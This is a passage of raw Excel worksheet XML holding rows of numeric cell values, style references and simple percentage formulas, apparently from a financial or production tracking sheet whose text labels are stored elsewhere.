      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194"/>
      <c r="G6" s="194"/>
      <c r="H6" s="194"/>
      <c r="I6" s="361">
        <v>276349.96</v>
      </c>
      <c r="J6" s="194"/>
      <c r="K6" s="194"/>
      <c r="L6" s="361">
        <v>262197.7</v>
      </c>
      <c r="M6" s="361">
        <v>32112.84</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198"/>
      <c r="S6" s="198"/>
      <c r="T6" s="362">
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198"/>
      <c r="V6" s="198"/>
      <c r="W6" s="362">
        <v>35.493999500998</v>
      </c>
      <c r="X6" s="198"/>
      <c r="Y6" s="198"/>
      <c r="Z6" s="362">
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>293</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194"/>
      <c r="G7" s="194"/>
      <c r="H7" s="194"/>
      <c r="I7" s="361">
        <v>0</v>
      </c>
      <c r="J7" s="194"/>
      <c r="K7" s="194"/>
      <c r="L7" s="361">
        <v>0</v>
      </c>
      <c r="M7" s="361">
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202"/>
      <c r="S7" s="202"/>
      <c r="T7" s="362">
        <v>131.931295590703</v>
      </c>
      <c r="U7" s="198"/>
      <c r="V7" s="198"/>
      <c r="W7" s="362">
        <v>31.005863273453</v>
      </c>
      <c r="X7" s="198"/>
      <c r="Y7" s="198"/>
      <c r="Z7" s="362">
        <v>2485.43</v>
      </c>
    </row>
    <row r="8" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194"/>
      <c r="G8" s="194"/>
      <c r="H8" s="194"/>
      <c r="I8" s="361">
        <v>525536.99</v>
      </c>
      <c r="J8" s="194"/>
      <c r="K8" s="194"/>
      <c r="L8" s="361">
        <v>507744.71</v>
      </c>
      <c r="M8" s="361">
        <v>41879.9</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198"/>
      <c r="S8" s="198"/>
      <c r="T8" s="362">
        <v>127.424266563489</v>
      </c>
      <c r="U8" s="198"/>
      <c r="V8" s="198"/>
      <c r="W8" s="362">
        <v>27.4058133732535</v>
      </c>
      <c r="X8" s="198"/>
      <c r="Y8" s="198"/>
      <c r="Z8" s="362">
        <v>2196.85</v>
      </c>
    </row>
    <row r="9" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194"/>
      <c r="G9" s="194"/>
      <c r="H9" s="194"/>
      <c r="I9" s="361">
        <v>4135388.88</v>
      </c>
      <c r="J9" s="194"/>
      <c r="K9" s="194"/>
      <c r="L9" s="361">
        <v>4097478.811</v>
      </c>
      <c r="M9" s="361">
        <v>110865.712</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198"/>
      <c r="S9" s="198"/>
      <c r="T9" s="362">
        <v>271.313032311606</v>
      </c>
      <c r="U9" s="198"/>
      <c r="V9" s="198"/>
      <c r="W9" s="362">
        <v>34.8751247504989</v>
      </c>
      <c r="X9" s="198"/>
      <c r="Y9" s="198"/>
      <c r="Z9" s="362">
        <v>2795.59</v>
      </c>
    </row>
    <row r="10" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194"/>
      <c r="G10" s="194"/>
      <c r="H10" s="194"/>
      <c r="I10" s="361">
        <v>917527.17</v>
      </c>
      <c r="J10" s="194"/>
      <c r="K10" s="194"/>
      <c r="L10" s="361">
        <v>897228.72</v>
      </c>
      <c r="M10" s="361">
        <v>61206.942</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198"/>
      <c r="S10" s="198"/>
      <c r="T10" s="362">
        <v>268.850893251232</v>
      </c>
      <c r="U10" s="198"/>
      <c r="V10" s="198"/>
      <c r="W10" s="362">
        <v>34.4817864271457</v>
      </c>
      <c r="X10" s="198"/>
      <c r="Y10" s="198"/>
      <c r="Z10" s="362">
        <v>2764.06</v>
      </c>
    </row>
    <row r="11" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194"/>
      <c r="G11" s="194"/>
      <c r="H11" s="194"/>
      <c r="I11" s="361">
        <v>0</v>
      </c>
      <c r="J11" s="194"/>
      <c r="K11" s="194"/>
      <c r="L11" s="361">
        <v>0</v>
      </c>
      <c r="M11" s="361">
        <v>0</v>
      </c>
      <c r="N11" s="195"/>
      <c r="O11" s="199"/>
      <c r="P11" s="200"/>
      <c r="Q11" s="203" t="s">
        <v>298</v>
      </c>
      <c r="R11" s="204"/>
      <c r="S11" s="204"/>
      <c r="T11" s="362"/>
      <c r="U11" s="204"/>
      <c r="V11" s="204"/>
      <c r="W11" s="362"/>
      <c r="X11" s="204"/>
      <c r="Y11" s="204"/>
      <c r="Z11" s="362"/>
    </row>
    <row r="12" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A12" s="191"/>
      <c r="B12" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D12" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E12" s="194">
        <v>312000</v>
      </c>
      <c r="F12" s="194"/>
      <c r="G12" s="194"/>
      <c r="H12" s="194"/>
      <c r="I12" s="361">
        <v>4942391.25</v>
      </c>
      <c r="J12" s="194"/>
      <c r="K12" s="194"/>
      <c r="L12" s="361">
        <v>5029106.376</v>
      </c>
      <c r="M12" s="361">
        <v>374437.15200005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>85.2932009111731</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204"/>
      <c r="S12" s="204"/>
      <c r="T12" s="362">
        <v>0</v>
      </c>
      <c r="U12" s="204"/>
      <c r="V12" s="204"/>
      <c r="W12" s="362">
        <v>0</v>
      </c>
      <c r="X12" s="204"/>
      <c r="Y12" s="204"/>
      <c r="Z12" s="362">
        <v>0</v>
      </c>
    </row>
    <row r="13" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <v>0</v>
      </c>
      <c r="F13" s="194"/>
      <c r="G13" s="194"/>
      <c r="H13" s="194"/>
      <c r="I13" s="361">
        <v>0</v>
      </c>
      <c r="J13" s="194"/>
      <c r="K13" s="194"/>
      <c r="L13" s="361">
        <v>0</v>
      </c>
      <c r="M13" s="361">
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/315000*100</f>
        <v>118.868937142873</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209"/>
      <c r="S13" s="209"/>
      <c r="T13" s="363">
        <v>266.382182640488</v>
      </c>
      <c r="U13" s="209"/>
      <c r="V13" s="209"/>
      <c r="W13" s="363">
        <v>71.5510229540918</v>
      </c>
      <c r="X13" s="210"/>
      <c r="Y13" s="210"/>
      <c r="Z13" s="364" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="14" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <v>0</v>
      </c>
      <c r="F14" s="194"/>
      <c r="G14" s="194"/>
      <c r="H14" s="194"/>
      <c r="I14" s="361">
        <v>964543.676</v>
      </c>
      <c r="J14" s="194"/>
      <c r="K14" s="194"/>
      <c r="L14" s="361">
        <v>1792944.106</v>
      </c>
      <c r="M14" s="361">
        <v>67362.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209"/>
      <c r="S14" s="209"/>
      <c r="T14" s="363">
        <v>213.500496709301</v>
      </c>
      <c r="U14" s="209"/>
      <c r="V14" s="209"/>
      <c r="W14" s="363">
        <v>50.2307884231537</v>
      </c>
      <c r="X14" s="210"/>
      <c r="Y14" s="210"/>
      <c r="Z14" s="364" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="15" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <v>0</v>
      </c>
      <c r="F15" s="194"/>
      <c r="G15" s="194"/>
      <c r="H15" s="194"/>
      <c r="I15" s="361">
        <v>0</v>
      </c>
      <c r="J15" s="194"/>
      <c r="K15" s="194"/>
      <c r="L15" s="361">
        <v>114756.5</v>
      </c>
      <c r="M15" s="361"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209"/>
      <c r="S15" s="209"/>
      <c r="T15" s="363">
        <v>61.2842570972103</v>
      </c>
      <c r="U15" s="209"/>
      <c r="V15" s="209"/>
      <c r="W15" s="363">
        <v>50.7547405189621</v>
      </c>
      <c r="X15" s="210"/>
      <c r="Y15" s="210"/>
      <c r="Z15" s="364" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="16" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194"/>
      <c r="H16" s="194"/>
      <c r="I16" s="194">
        <v>0</v>
      </c>
      <c r="J16" s="194"/>
      <c r="K16" s="194"/>
      <c r="L16" s="194">
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209"/>
      <c r="S16" s="209"/>
      <c r="T16" s="363">
        <v>62.9166845398954</v>
      </c>
      <c r="U16" s="209"/>
      <c r="V16" s="209"/>
      <c r="W16" s="363">
        <v>52.3480538922156</v>
      </c>
      <c r="X16" s="210"/>
      <c r="Y16" s="210"/>
      <c r="Z16" s="364" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="17" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <v>810000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194"/>
      <c r="H17" s="194"/>
      <c r="I17" s="194">
        <v>0</v>
      </c>
      <c r="J17" s="194"/>
      <c r="K17" s="194"/>
      <c r="L17" s="194">
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209"/>
      <c r="S17" s="209"/>
      <c r="T17" s="363">
        <v>0</v>
      </c>
      <c r="U17" s="209"/>
      <c r="V17" s="209"/>
      <c r="W17" s="363">
        <v>0</v>
      </c>
      <c r="X17" s="209"/>
      <c r="Y17" s="209"/>
      <c r="Z17" s="363">
        <v>0</v>
      </c>
    </row>
    <row r="18" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194"/>
      <c r="H18" s="194"/>
      <c r="I18" s="194">
        <v>0</v>
      </c>
      <c r="J18" s="194"/>
      <c r="K18" s="194"/>
      <c r="L18" s="194">
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209"/>
      <c r="S18" s="209"/>
      <c r="T18" s="363">
        <v>222.404925880448</v>
      </c>
      <c r="U18" s="209"/>
      <c r="V18" s="209"/>
      <c r="W18" s="363">
        <v>7.01010479041916</v>
      </c>
      <c r="X18" s="209"/>
      <c r="Y18" s="209"/>
      <c r="Z18" s="363">
        <v>561.93</v>
      </c>
    </row>
    <row r="19" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194"/>
      <c r="H19" s="194"/>
      <c r="I19" s="194">
        <v>0</v>
      </c>
      <c r="J19" s="194"/>
      <c r="K19" s="194"/>
      <c r="L19" s="194">
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209"/>
      <c r="S19" s="209"/>
      <c r="T19" s="363">
        <v>9.09090909090909e-6</v>
      </c>
      <c r="U19" s="209"/>
      <c r="V19" s="209"/>
      <c r="W19" s="363">
        <v>4.25399201596806e-6</v>
      </c>
      <c r="X19" s="209"/>
      <c r="Y19" s="209"/>
      <c r="Z19" s="363">
        <v>0.000341</v>
      </c>
    </row>
    <row r="20" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <v>40000</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194"/>
      <c r="H20" s="194"/>
      <c r="I20" s="194">
        <v>0</v>
      </c>
      <c r="J20" s="194"/>
      <c r="K20" s="194"/>
      <c r="L20" s="194">
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209"/>
      <c r="S20" s="209"/>
      <c r="T20" s="363">
        <v>239.299858069946</v>
      </c>
      <c r="U20" s="209"/>
      <c r="V20" s="209"/>
      <c r="W20" s="363">
        <v>72.1273745134731</v>
      </c>
      <c r="X20" s="209"/>
      <c r="Y20" s="209"/>
      <c r="Z20" s="363">
        <v>5781.730341</v>
      </c>
    </row>
    <row r="21" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>312000</v>
      </c>
      <c r="F21" s="194"/>
      <c r="G21" s="194"/>
      <c r="H21" s="194"/>
      <c r="I21" s="361">
        <v>2109438</v>
      </c>
      <c r="J21" s="194"/>
      <c r="K21" s="194"/>
      <c r="L21" s="361">
        <v>2066454</v>
      </c>
      <c r="M21" s="361">
        <v>83053.31</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>176.709170212766</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209"/>
      <c r="S21" s="209"/>
      <c r="T21" s="363">
        <v>275.680678324311</v>
      </c>
      <c r="U21" s="209"/>
      <c r="V21" s="209"/>
      <c r="W21" s="363">
        <v>36.1247920825017</v>
      </c>
      <c r="X21" s="209"/>
      <c r="Y21" s="209"/>
      <c r="Z21" s="363">
        <v>2895.76333333333</v>
      </c>
    </row>
    <row r="22" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>97000</v>
      </c>
      <c r="F22" s="194"/>
      <c r="G22" s="194"/>
      <c r="H22" s="194"/>
      <c r="I22" s="361">
        <v>2030981</v>
      </c>
      <c r="J22" s="194"/>
      <c r="K22" s="194"/>
      <c r="L22" s="361">
        <v>1891461.38</v>
      </c>
      <c r="M22" s="361">
        <v>189966.352</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>94.983176</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209"/>
      <c r="S22" s="209"/>
      <c r="T22" s="363">
        <v>102.260062685507</v>
      </c>
      <c r="U22" s="209"/>
      <c r="V22" s="209"/>
      <c r="W22" s="363">
        <v>45.3787286538035</v>
      </c>
      <c r="X22" s="209"/>
      <c r="Y22" s="209"/>
      <c r="Z22" s="363">
        <v>3637.55888888889</v>
      </c>
    </row>
    <row r="23" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194"/>
      <c r="G23" s="194"/>
      <c r="H23" s="194"/>
      <c r="I23" s="361">
        <v>0</v>
      </c>
      <c r="J23" s="194"/>
      <c r="K23" s="194"/>
      <c r="L23" s="361">
        <v>0</v>
      </c>
      <c r="M23" s="361">
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209"/>
      <c r="S23" s="209"/>
      <c r="T23" s="363">
        <v>79.1276036709645</v>
      </c>
      <c r="U23" s="209"/>
      <c r="V23" s="209"/>
      <c r="W23" s="363">
        <v>32.4957065036594</v>
      </c>
      <c r="X23" s="209"/>
      <c r="Y23" s="209"/>
      <c r="Z23" s="363">
        <v>2604.85583333333</v>
      </c>
    </row>
    <row r="24" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194"/>
      <c r="G24" s="194"/>
      <c r="H24" s="194"/>
      <c r="I24" s="361">
        <v>0</v>
      </c>
      <c r="J24" s="194"/>
      <c r="K24" s="194"/>
      <c r="L24" s="361">
        <v>279826.53</v>
      </c>
      <c r="M24" s="361">
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209"/>
      <c r="S24" s="209"/>
      <c r="T24" s="363">
        <v>86.49</v>
      </c>
      <c r="U24" s="209"/>
      <c r="V24" s="209"/>
      <c r="W24" s="363">
        <v>52.3193612774451</v>
      </c>
      <c r="X24" s="209"/>
      <c r="Y24" s="209"/>
      <c r="Z24" s="363">
        <v>4193.92</v>
      </c>
    </row>
    <row r="25" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194"/>
      <c r="H25" s="194"/>
      <c r="I25" s="361">
        <v>0</v>
      </c>
      <c r="J25" s="194"/>
      <c r="K25" s="194"/>
      <c r="L25" s="361">
        <v>79320.85</v>
      </c>
      <c r="M25" s="361"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209"/>
      <c r="S25" s="209"/>
      <c r="T25" s="363">
        <v>187.67</v>
      </c>
      <c r="U25" s="209"/>
      <c r="V25" s="209"/>
      <c r="W25" s="363">
        <v>50.1818862275449</v>
      </c>
      <c r="X25" s="209"/>
      <c r="Y25" s="209"/>
      <c r="Z25" s="363">
        <v>4022.58</v>
      </c>
    </row>
    <row r="26" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194"/>
      <c r="I26" s="194">
        <v>0</v>
      </c>
      <c r="J26" s="194"/>
      <c r="K26" s="194"/>
      <c r="L26" s="194">
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209"/>
      <c r="S26" s="209"/>
      <c r="T26" s="363">
        <v>0</v>
      </c>
      <c r="U26" s="209"/>
      <c r="V26" s="209"/>
      <c r="W26" s="363">
        <v>0</v>
      </c>
      <c r="X26" s="209"/>
      <c r="Y26" s="209"/>
      <c r="Z26" s="363">
        <v>0</v>
      </c>
    </row>
    <row r="27" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>240000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194"/>
      <c r="I27" s="194">
        <v>0</v>
      </c>
      <c r="J27" s="194"/>
      <c r="K27" s="194"/>
      <c r="L27" s="194">
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209"/>
      <c r="S27" s="209"/>
      <c r="T27" s="363">
        <v>25.3754018553095</v>
      </c>
      <c r="U27" s="221"/>
      <c r="V27" s="209"/>
      <c r="W27" s="363">
        <v>68.374251497006</v>
      </c>
      <c r="X27" s="209"/>
      <c r="Y27" s="209"/>
      <c r="Z27" s="363" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="28" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194"/>
      <c r="I28" s="194">
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194"/>
      <c r="L28" s="194">
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209"/>
      <c r="S28" s="209"/>
      <c r="T28" s="363">
        <v>25.9434319945404</v>
      </c>
      <c r="U28" s="209"/>
      <c r="V28" s="209"/>
      <c r="W28" s="363">
        <v>64.3718812375249</v>
      </c>
      <c r="X28" s="209"/>
      <c r="Y28" s="209"/>
      <c r="Z28" s="363">
        <v>5160.05</v>
      </c>
    </row>
    <row r="29" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194"/>
      <c r="I29" s="194">
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194"/>
      <c r="L29" s="194">
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209"/>
      <c r="S29" s="209"/>
      <c r="T29" s="363">
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209"/>
      <c r="V29" s="209"/>
      <c r="W29" s="363">
        <v>34.9823103792415</v>
      </c>
      <c r="X29" s="209"/>
      <c r="Y29" s="209"/>
      <c r="Z29" s="363">
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194"/>
      <c r="I30" s="194">
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194"/>
      <c r="L30" s="194">
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209"/>
      <c r="S30" s="226"/>
      <c r="T30" s="363">
        <v>0</v>
      </c>
      <c r="U30" s="209"/>
      <c r="V30" s="209"/>
      <c r="W30" s="363">
        <v>0</v>
      </c>
      <c r="X30" s="209"/>
      <c r="Y30" s="209"/>
      <c r="Z30" s="363">
        <v>0</v>
      </c>
    </row>
    <row r="31" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>180000</v>
      </c>
      <c r="F31" s="194"/>
      <c r="G31" s="194"/>
      <c r="H31" s="194"/>
      <c r="I31" s="361">
        <v>1373007</v>
      </c>
      <c r="J31" s="194"/>
      <c r="K31" s="194"/>
      <c r="L31" s="361">
        <v>1356048.13</v>
      </c>
      <c r="M31" s="365">
        <v>65429.37</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>87.23916</v>
      </c>
      <c r="O31" s="222"/>
      <c r="P31" s="223"/>
      <c r="Q31" s="224"/>
      <c r="R31" s="209"/>
      <c r="S31" s="226"/>
      <c r="T31" s="363"/>
      <c r="U31" s="209"/>
      <c r="V31" s="209"/>
      <c r="W31" s="363"/>
      <c r="X31" s="209"/>
      <c r="Y31" s="209"/>
      <c r="Z31" s="363"/>
    </row>
    <row r="32" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A32" s="191"/>
      <c r="B32" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C32" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D32" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E32" s="194">
        <v>97000</v>
      </c>
      <c r="F32" s="194"/>
      <c r="G32" s="194"/>
      <c r="H32" s="194"/>
      <c r="I32" s="361">
        <v>1527843</v>
